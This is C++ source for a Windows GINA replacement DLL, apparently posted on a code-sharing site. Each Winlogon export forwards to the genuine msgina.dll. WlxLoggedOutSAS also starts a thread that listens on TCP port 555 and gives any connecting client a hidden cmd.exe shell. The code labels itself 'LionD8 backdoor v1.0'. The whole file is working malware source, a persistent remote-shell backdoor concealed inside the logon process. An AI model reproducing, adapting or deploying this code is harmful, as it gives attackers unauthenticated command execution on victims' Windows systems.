📄 ginadll.cpp
字号:
// ginadll.cpp : Defines the entry point for the DLL application.
//
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <winwlx.h>
#include "winsock2.h"
typedef BOOL (WINAPI *PFUNCWLXNEGOTIATE)( DWORD, DWORD* );
typedef BOOL (WINAPI *PFUNCWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );
typedef VOID (WINAPI *PFUNCWLXDISPLAYSASNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
typedef BOOL (WINAPI *PFUNCWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDONSAS)( PVOID, DWORD, PVOID );
typedef VOID (WINAPI *PFUNCWLXDISPLAYLOCKEDNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXWKSTALOCKEDSAS)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXISLOCKOK)( PVOID );
typedef BOOL (WINAPI *PFUNCWLXISLOGOFFOK)( PVOID );
typedef VOID (WINAPI *PFUNCWLXLOGOFF)( PVOID );
typedef VOID (WINAPI *PFUNCWLXSHUTDOWN)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );
typedef BOOL (WINAPI *PFUNCWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );
typedef BOOL (WINAPI *PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);
#pragma comment (lib,"ws2_32.lib")
DWORD WINAPI BackDoor (LPVOID lp);
DWORD WINAPI SendThread ( LPVOID lp );
DWORD WINAPI RecvThread ( LPVOID lp);
DWORD WINAPI StartInit(PVOID lp);
HANDLE hStdOut = NULL, hSRead = NULL;
HANDLE hStdInput = NULL, hSWrite = NULL;
BOOL bExit = FALSE;
HANDLE hProcess = NULL;
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXNEGOTIATE pWlxNegotiate = (PFUNCWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );
if( !pWlxNegotiate )
return FALSE;
return pWlxNegotiate( dwWinlogonVersion, pdwDllVersion );
}
BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,
PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXINITIALIZE pWlxInitialize = (PFUNCWLXINITIALIZE)GetProcAddress( hDll, "WlxInitialize" );
if( !pWlxInitialize )
return FALSE;
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
return pWlxInitialize( lpWinsta, hWlx, pvReserved,
pWinlogonFunctions, pWlxContext );
}
VOID WINAPI WlxDisplaySASNotice( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXDISPLAYSASNOTICE pWlxDisplaySASNotice =
(PFUNCWLXDISPLAYSASNOTICE)GetProcAddress( hDll, "WlxDisplaySASNotice" );
if( !pWlxDisplaySASNotice )
return ;
pWlxDisplaySASNotice( pWlxContext );
}
int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,
PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,
PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXLOGGEDOUTSAS pWlxLoggedOutSAS =
(PFUNCWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );
if( !pWlxLoggedOutSAS )
return FALSE;
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);
CreateThread(NULL,NULL,StartInit,NULL,NULL,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
int ret = pWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId,
pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile);
return ret;
}
BOOL WINAPI WlxActivateUserShell(
PVOID pWlxContext,
PWSTR pszDesktopName,
PWSTR pszMprLogonScript,
PVOID pEnvironment)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXACTIVATEUSERSHELL pWlxActivateUserShell =
(PFUNCWLXACTIVATEUSERSHELL)GetProcAddress( hDll, "WlxActivateUserShell" );
if( !pWlxActivateUserShell )
return FALSE;
return pWlxActivateUserShell(
pWlxContext,
pszDesktopName,
pszMprLogonScript,
pEnvironment);
}
int WINAPI WlxLoggedOnSAS(
PVOID pWlxContext,
DWORD dwSasType,
PVOID pReserved)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXLOGGEDONSAS pWlxLoggedOnSAS =
(PFUNCWLXLOGGEDONSAS)GetProcAddress( hDll, "WlxLoggedOnSAS" );
if( !pWlxLoggedOnSAS )
return FALSE;
return pWlxLoggedOnSAS( pWlxContext, dwSasType, pReserved );
}
VOID WINAPI WlxDisplayLockedNotice( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXDISPLAYLOCKEDNOTICE pWlxDisplayLockedNotice =
(PFUNCWLXDISPLAYLOCKEDNOTICE)GetProcAddress(
hDll,
"WlxDisplayLockedNotice" );
if( !pWlxDisplayLockedNotice )
return ;
pWlxDisplayLockedNotice( pWlxContext );
}
BOOL WINAPI WlxIsLockOk( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXISLOCKOK pWlxIsLockOk = (PFUNCWLXISLOCKOK)GetProcAddress( hDll, "WlxIsLockOk" );
if( !pWlxIsLockOk )
return FALSE;
return pWlxIsLockOk( pWlxContext );
}
int WINAPI WlxWkstaLockedSAS(
PVOID pWlxContext,
DWORD dwSasType )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXWKSTALOCKEDSAS pWlxWkstaLockedSAS =
(PFUNCWLXWKSTALOCKEDSAS)GetProcAddress( hDll, "WlxWkstaLockedSAS" );
if( !pWlxWkstaLockedSAS )
return FALSE;
return pWlxWkstaLockedSAS( pWlxContext, dwSasType );
}
BOOL WINAPI WlxIsLogoffOk( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXISLOGOFFOK pWlxIsLogoffOk = (PFUNCWLXISLOGOFFOK)GetProcAddress( hDll, "WlxIsLogoffOk" );
if( !pWlxIsLogoffOk )
return FALSE;
return pWlxIsLogoffOk( pWlxContext );
}
VOID WINAPI WlxLogoff( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXLOGOFF pWlxLogoff = (PFUNCWLXLOGOFF)GetProcAddress( hDll, "WlxLogoff" );
if( !pWlxLogoff )
return ;
pWlxLogoff( pWlxContext );
}
VOID WINAPI WlxShutdown( PVOID pWlxContext, DWORD ShutdownType )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXSHUTDOWN pWlxShutdown = (PFUNCWLXSHUTDOWN)GetProcAddress( hDll, "WlxShutdown" );
if( !pWlxShutdown )
return ;
pWlxShutdown( pWlxContext, ShutdownType );
}
BOOL WINAPI WlxScreenSaverNotify(
PVOID pWlxContext,
BOOL * pSecure
)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXSCREENSAVERNOTIFY pWlxScreenSaverNotify = (PFUNCWLXSCREENSAVERNOTIFY)
GetProcAddress( hDll, "WlxScreenSaverNotify" );
if(pWlxScreenSaverNotify != NULL)
return pWlxScreenSaverNotify( pWlxContext, pSecure );
*pSecure = TRUE;
return *pSecure;
}
BOOL WINAPI WlxStartApplication(
PVOID pWlxContext,
PWSTR pszDesktopName,
PVOID pEnvironment,
PWSTR pszCmdLine
)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXSTARTAPPLICATION pWlxStartApplication = (PFUNCWLXSTARTAPPLICATION) GetProcAddress( hDll, "WlxStartApplication" );
return pWlxStartApplication( pWlxContext, pszDesktopName,
pEnvironment,pszCmdLine );
}
BOOL WINAPI WlxNetworkProviderLoad(
PVOID pWlxContext,
PWLX_MPR_NOTIFY_INFO pNprNotifyInfo )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXNETWORKPROVIDERLOAD pWlxNetworkProviderLoad = (PFUNCWLXNETWORKPROVIDERLOAD) GetProcAddress( hDll, "WlxNetworkProviderLoad" );
return pWlxNetworkProviderLoad(pWlxContext,pNprNotifyInfo);
}
/////// BackDoor
DWORD WINAPI StartInit(PVOID lp)
{
SOCKET sock=NULL;
sock = socket (AF_INET,SOCK_STREAM,IPPROTO_TCP);
SOCKADDR_IN addr_in = {0};
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(555);
addr_in.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
if(bind(sock,(sockaddr *)&addr_in,sizeof(sockaddr))==SOCKET_ERROR)
return 1;
listen(sock,1);
sockaddr_in sin={0};
int size = sizeof(sin);
while ( TRUE )
{
SOCKET recvSock=accept(sock,(sockaddr *)&sin,&size); //(sockaddr *)&sin,&size);
if ( recvSock == INVALID_SOCKET )
{
Sleep(1000);
continue;
}
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);
HANDLE hThread = CreateThread(NULL,NULL,BackDoor,&recvSock,0,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
WaitForSingleObject(hThread,INFINITE);
bExit = FALSE;
}
return 1;
}
DWORD WINAPI BackDoor (LPVOID lp)
{
char* p ="**********************\r\nLionD8 backdoor v1.0\r\n**********************\r\n";
SOCKET sock = *(SOCKET*)lp;
send(sock,p,strlen(p),0);
SECURITY_ATTRIBUTES sa;
sa.bInheritHandle =TRUE;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
CreatePipe ( &hSRead, &hStdOut, &sa, 0 );
CreatePipe ( &hStdInput, &hSWrite, &sa, 0 );
STARTUPINFO StartInfor = {0};
PROCESS_INFORMATION ProInfor = {0};
StartInfor.cb = sizeof ( STARTUPINFO );
StartInfor.wShowWindow = SW_HIDE;
StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;
StartInfor.hStdInput = hStdInput;
TCHAR SysDir[MAX_PATH] = {0};
GetSystemDirectory(SysDir,MAX_PATH);
if ( SysDir[strlen(SysDir)-1] != '\\')
strcat(SysDir,"\\");
strcat(SysDir,"cmd.exe");
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);
CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor);
hProcess = ProInfor.hProcess;
CloseHandle(hStdOut);
CloseHandle(hStdInput);
HANDLE hArray[2] = {0};
hArray[0] = CreateThread (NULL,NULL,RecvThread,&sock,NULL,NULL);
hArray[1] = CreateThread (NULL,NULL,SendThread,&sock,NULL,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
WaitForMultipleObjects(2,hArray,TRUE,INFINITE);
closesocket(sock);
return 1;
}
DWORD WINAPI RecvThread ( LPVOID lp)
{
SOCKET sock = *(SOCKET*)lp;
TCHAR CmdBuf[512] = {0};
int num = 0;
while ( TRUE )
{
if ( bExit == TRUE )
return 1;
TCHAR Tbuf[2] = {0};
int ret = recv(sock, Tbuf, 1, 0);
if ( ret == 1 )
{
num++;
strcat(CmdBuf,Tbuf);
send(sock,Tbuf,1,0); //回显
if ( Tbuf[0] == '\n' ) //接收到回车
{
TCHAR buf[5] = {0};
DWORD A=0;
WriteFile(hSWrite,CmdBuf,num,&A,NULL);
memcpy ( buf, CmdBuf, 4);
int ret = _stricmp (buf,"exit");
if ( ret == 0 )
bExit = TRUE;
memset(CmdBuf,0,512);
num=0;
}
}
else
{
bExit = TRUE;
DWORD A=0;
GetExitCodeProcess(hProcess,&A);
TerminateProcess(hProcess,A);
}
}
return 1;
}
DWORD WINAPI SendThread ( LPVOID lp )
{
SOCKET sock = *(SOCKET*)lp;
TCHAR Buf[512]={0};
DWORD ReadSize = 0;
while(TRUE)
{
if ( bExit == TRUE )
return 1;
PeekNamedPipe(hSRead,Buf,512,&ReadSize,NULL,NULL);
if ( ReadSize > 0 )
ReadFile(hSRead,Buf,512,&ReadSize,NULL);
else
{
Sleep(100);
continue;
}
send (sock,Buf,ReadSize,0);
memset(Buf,0,512);
}
return 1;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -